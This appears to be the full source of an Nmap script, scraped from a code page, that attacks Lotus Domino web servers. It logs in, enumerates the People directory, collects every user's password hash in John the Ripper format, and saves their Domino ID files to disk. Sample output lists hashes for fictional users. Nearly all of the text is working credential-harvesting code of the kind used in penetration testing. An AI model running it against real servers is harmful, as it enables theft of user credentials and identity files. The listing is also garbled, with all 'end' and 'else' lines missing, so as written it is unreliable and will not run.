355 lines
14 KiB
355 lines
14 KiB
local creds = require "creds"
local http = require "http"
local io = require "io"
local shortport = require "shortport"
local stdnse = require "stdnse"
local stringaux = require "stringaux"
local table = require "table"
description = [[
Attempts to enumerate the hashed Domino Internet Passwords that are (by
default) accessible by all authenticated users. This script can also download
any Domino ID Files attached to the Person document. Passwords are presented
in a form suitable for running in John the Ripper.
The passwords may be stored in two forms (http://comments.gmane.org/gmane.comp.security.openwall.john.user/785):
1. Saltless (legacy support?)
Example: 355E98E7C7B59BD810ED845AD0FD2FC4
John's format name: lotus5
2. Salted (also known as "More Secure Internet Password")
Example: (GKjXibCW2Ml6juyQHUoP)
John's format name: dominosec
It appears as if form based authentication is enabled, basic authentication
still works. Therefore the script should work in both scenarios. Valid
credentials can either be supplied directly using the parameters username
and password or indirectly from results of http-brute or http-form-brute.
-- @usage
-- nmap --script http-domino-enum-passwords -p 80 <host> --script-args http-domino-enum-passwords.username='patrik karlsson',http-domino-enum-passwords.password=secret
-- @output
-- 80/tcp open http syn-ack
-- | http-domino-enum-passwords:
-- | Information
-- | Information retrieved as: "Jim Brass"
-- | Internet hashes (salted, jtr: --format=DOMINOSEC)
-- | Jim Brass:(GYvlbOz2idzni5peJUdD)
-- | Warrick Brown:(GZghNctqAnJgyklUl2ml)
-- | Gill Grissom:(GyhsteeXTr75YOSwW8mc)
-- | David Hodges:(GZEJRHqJEVc5IZCsNX0U)
-- | Ray Langston:(GE18MGVGD/8ftYMFaVlY)
-- | Greg Sanders:(GHpdG/7FX7iXXlaoY5sj)
-- | Sara Sidle:(GWzgG0kCQ5qmnqARL3cl)
-- | Wendy Simms:(G6wooaElHpsvA4TPvSfi)
-- | Nick Stokes:(Gdo2TJBRj1Ervrs9lPUp)
-- | Catherine Willows:(GlDc3QP5ePFR38d7lQeM)
-- | Internet hashes (unsalted, jtr: --format=lotus5)
-- | Ada Lovelace:355E98E7C7B59BD810ED845AD0FD2FC4
-- | John Smith:655E98E7C7B59BD810ED845AD0FD2FD4
-- | ID Files
-- | Jim Brass ID File has been downloaded (/tmp/id/Jim Brass.id)
-- | Warrick Brown ID File has been downloaded (/tmp/id/Warrick Brown.id)
-- | Gill Grissom ID File has been downloaded (/tmp/id/Gill Grissom.id)
-- | David Hodges ID File has been downloaded (/tmp/id/David Hodges.id)
-- | Ray Langston ID File has been downloaded (/tmp/id/Ray Langston.id)
-- | Greg Sanders ID File has been downloaded (/tmp/id/Greg Sanders.id)
-- | Sara Sidle ID File has been downloaded (/tmp/id/Sara Sidle.id)
-- | Wendy Simms ID File has been downloaded (/tmp/id/Wendy Simms.id)
-- | Nick Stokes ID File has been downloaded (/tmp/id/Nick Stokes.id)
-- | Catherine Willows ID File has been downloaded (/tmp/id/Catherine Willows.id)
-- |
-- |_ Results limited to 10 results (see http-domino-enum-passwords.count)
-- @args http-domino-enum-passwords.path points to the path protected by
-- authentication. Default:"/names.nsf/People?OpenView"
-- @args http-domino-enum-passwords.hostname sets the host header in case of virtual hosting.
-- Not needed if target is specified by name.
-- @args http-domino-enum-passwords.count the number of internet hashes and id files to fetch.
-- If a negative value is given, all hashes and id files are retrieved (default: 10)
-- @args http-domino-enum-passwords.idpath the path where downloaded ID files should be saved
-- If not given, the script will only indicate if the ID file is donwloadable or not
-- @args http-domino-enum-passwords.username Username for HTTP auth, if required
-- @args http-domino-enum-passwords.password Password for HTTP auth, if required
-- Version 0.4
-- Created 07/30/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>
-- Revised 07/31/2010 - v0.2 - add support for downloading ID files
-- Revised 11/25/2010 - v0.3 - added support for separating hash-type <martin@swende.se>
-- Revised 04/16/2015 - v0.4 - switched to 'creds' credential repository <nnposter>
author = "Patrik Karlsson"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "auth"}
dependencies = {"http-brute", "http-form-brute"}
portrule = shortport.port_or_service({80, 443}, {"http","https"}, "tcp", "open")
--- Checks if the <code>path</code> require authentication
-- @param host table as received by the action function or the name specified
-- in the hostname argument
-- @param port table as received by the action function
-- @param path against which to check if authentication is required
local function requiresAuth( host, port, path )
local result = http.get(host, port, "/names.nsf")
if ( result.status == 401 ) then
return true
elseif ( result.status == 200 and result.body and result.body:match("<input.-type=[\"]*password[\"]*") ) then
return true
return false
--- Checks if the credentials are valid and allow access to <code>path</code>
-- @param host table as received by the action function or the name specified
-- in the hostname argument
-- @param port as received by the action method
-- @param path the patch against which to validate the credentials
-- @param user the username used for authentication
-- @param pass the password used for authentication
-- @return true on valid access, false on failure
local function isValidCredential( host, port, path, user, pass )
-- we need to supply the no_cache directive, or else the http library
-- incorrectly tells us that the authentication was successful
local result = http.get( host, port, path, { auth = { username = user, password = pass }, no_cache = true })
if ( result.status == 401 ) then
return false
return true
--- Retrieves all uniq links in a pages
-- @param body the html content of the received page
-- @param filter a filter to use for additional link filtering
-- @param links [optional] table containing previously retrieved links
-- @return links table containing retrieved links
local function getLinks( body, filter, links )
local tmp = {}
local links = links or {}
local filter = filter or ".*"
if ( not(body) ) then return end
for _, v in ipairs( links ) do
tmp[v] = true
for link in body:gmatch("<a href=\"([^\"]+)\"") do
-- use link as key in order to remove duplicates
if ( link:match(filter)) then
tmp[link] = true
links = {}
for k, _ in pairs(tmp) do
table.insert(links, k)
return links
--- Retrieves the "next page" path from the returned document
-- @param body the html content of the received page
-- @return link to next page
local function getPager( body )
return body:match("<form.+action=\"(.+%?ReadForm)&" )
--- Retrieves the username and passwords for a user
-- @param body the html content of the received page
-- @return full_name the full name of the user
-- @return password the password hash for the user
local function getUserDetails( body )
-- retrieve the details
local full_name = body:match("<input name=\"FullName\".-value=\"(.-)\">")
local http_passwd = body:match("<input name=\"HTTPPassword\".-value=\"(.-)\">")
local dsp_http_passwd = body:match("<input name=\"dspHTTPPassword\".-value=\"(.-)\">")
local id_file = body:match("<a href=\"(.-UserID)\">")
-- Remove the parenthesis around the password
http_passwd = http_passwd:sub(2,-2)
-- In case we have more than one full name, return only the last
full_name = stringaux.strsplit(";%s*", full_name)
full_name = full_name[#full_name]
return { fullname = full_name, passwd = ( http_passwd or dsp_http_passwd ), idfile = id_file }
--- Saves the ID file to disk
-- @param filename string containing the name and full path to the file
-- @param data contains the data
-- @return status true on success, false on failure
-- @return err string containing error message if status is false
local function saveIDFile( filename, data )
local f = io.open( filename, "w")
if ( not(f) ) then
return false, ("Failed to open file (%s)"):format(filename)
if ( not(f:write( data ) ) ) then
return false, ("Failed to write file (%s)"):format(filename)
return true
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
local path = stdnse.get_script_args(SCRIPT_NAME .. '.path') or "/names.nsf/People?OpenView"
local download_path = stdnse.get_script_args(SCRIPT_NAME .. '.idpath')
local vhost= stdnse.get_script_args(SCRIPT_NAME .. '.hostname')
local user = stdnse.get_script_args(SCRIPT_NAME .. '.username')
local pass = stdnse.get_script_args(SCRIPT_NAME .. '.password')
local pos, pager
local links, result, hashes,legacyHashes, id_files = {}, {}, {}, {},{}
local chunk_size = 30
local max_fetch = tonumber(stdnse.get_script_args(SCRIPT_NAME .. '.count')) or 10
local http_response
local has_creds = false
-- authentication required?
if ( requiresAuth( vhost or host, port, path ) ) then
-- A user was provided, attempt to authenticate
if ( user ) then
if (not(isValidCredential( vhost or host, port, path, user, pass )) ) then
return fail("The provided credentials were invalid")
local c = creds.Credentials:new(creds.ALL_DATA, host, port)
for cred in c:getCredentials(creds.State.VALID) do
has_creds = true
if (isValidCredential(vhost or host, port, path, cred.user, cred.pass)) then
user = cred.user
pass = cred.pass
if not pass then
local msg = has_creds and "No valid credentials were found" or "No credentials supplied"
return fail(("%s (see http-domino-enum-passwords.username and http-domino-enum-passwords.password)"):format(msg))
http_response = http.get( vhost or host, port, path, { auth = { username = user, password = pass }, no_cache = true })
if http_response.status and http_response.status ==200 then
pager = getPager( http_response.body )
if ( not(pager) ) then
if ( http_response.body and
http_response.body:match(".*<input type=\"submit\".* value=\"Sign In\">.*" ) ) then
return fail("Failed to authenticate")
return fail("Failed to process results")
pos = 1
-- first collect all links
while( true ) do
path = pager .. "&Start=" .. pos
http_response = http.get( vhost or host, port, path, { auth = { username = user, password = pass }, no_cache = true })
if ( http_response.status == 200 ) then
local size = #links
links = getLinks( http_response.body, "%?OpenDocument", links )
-- No additions were made
if ( size == #links ) then
if ( max_fetch > 0 and max_fetch < #links ) then
pos = pos + chunk_size
for _, link in ipairs(links) do
stdnse.debug2("Fetching link: %s", link)
http_response = http.get( vhost or host, port, link, { auth = { username = user, password = pass }, no_cache = true })
local u_details = getUserDetails( http_response.body )
if ( max_fetch > 0 and (#hashes+#legacyHashes)>= max_fetch ) then
if ( u_details.fullname and u_details.passwd and #u_details.passwd > 0 ) then
stdnse.debug2("Found Internet hash for: %s:%s", u_details.fullname, u_details.passwd)
-- Old type are 32 bytes, new are 20
if #u_details.passwd == 32 then
table.insert( legacyHashes, ("%s:%s"):format(u_details.fullname, u_details.passwd))
table.insert( hashes, ("%s:(%s)"):format(u_details.fullname, u_details.passwd))
if ( u_details.idfile ) then
stdnse.debug2("Found ID file for user: %s", u_details.fullname)
if ( download_path ) then
stdnse.debug2("Downloading ID file for user: %s", u_details.full_name)
http_response = http.get( vhost or host, port, u_details.idfile, { auth = { username = user, password = pass }, no_cache = true })
if ( http_response.status == 200 ) then
local filename = download_path .. "/" .. stringaux.filename_escape(u_details.fullname .. ".id")
local status, err = saveIDFile( filename, http_response.body )
if ( status ) then
table.insert( id_files, ("%s ID File has been downloaded (%s)"):format(u_details.fullname, filename) )
table.insert( id_files, ("%s ID File was not saved (error: %s)"):format(u_details.fullname, err ) )
table.insert( id_files, ("%s ID File was not saved (error: unexpected response from server)"):format( u_details.fullname ) )
table.insert( id_files, ("%s has ID File available for download"):format(u_details.fullname) )
if( #hashes + #legacyHashes > 0) then
table.insert( result, { name = "Information", [1] = ("Information retrieved as: \"%s\""):format(user) } )
if ( #hashes ) then
hashes.name = "Internet hashes (salted, jtr: --format=DOMINOSEC)"
table.insert( result, hashes )
if (#legacyHashes ) then
legacyHashes.name = "Internet hashes (unsalted, jtr: --format=lotus5)"
table.insert( result, legacyHashes )
if ( #id_files ) then
id_files.name = "ID Files"
table.insert( result, id_files )
local result = stdnse.format_output(true, result)
if ( max_fetch > 0 ) then
result = result .. (" \n Results limited to %d results (see http-domino-enum-passwords.count)"):format(max_fetch)
return result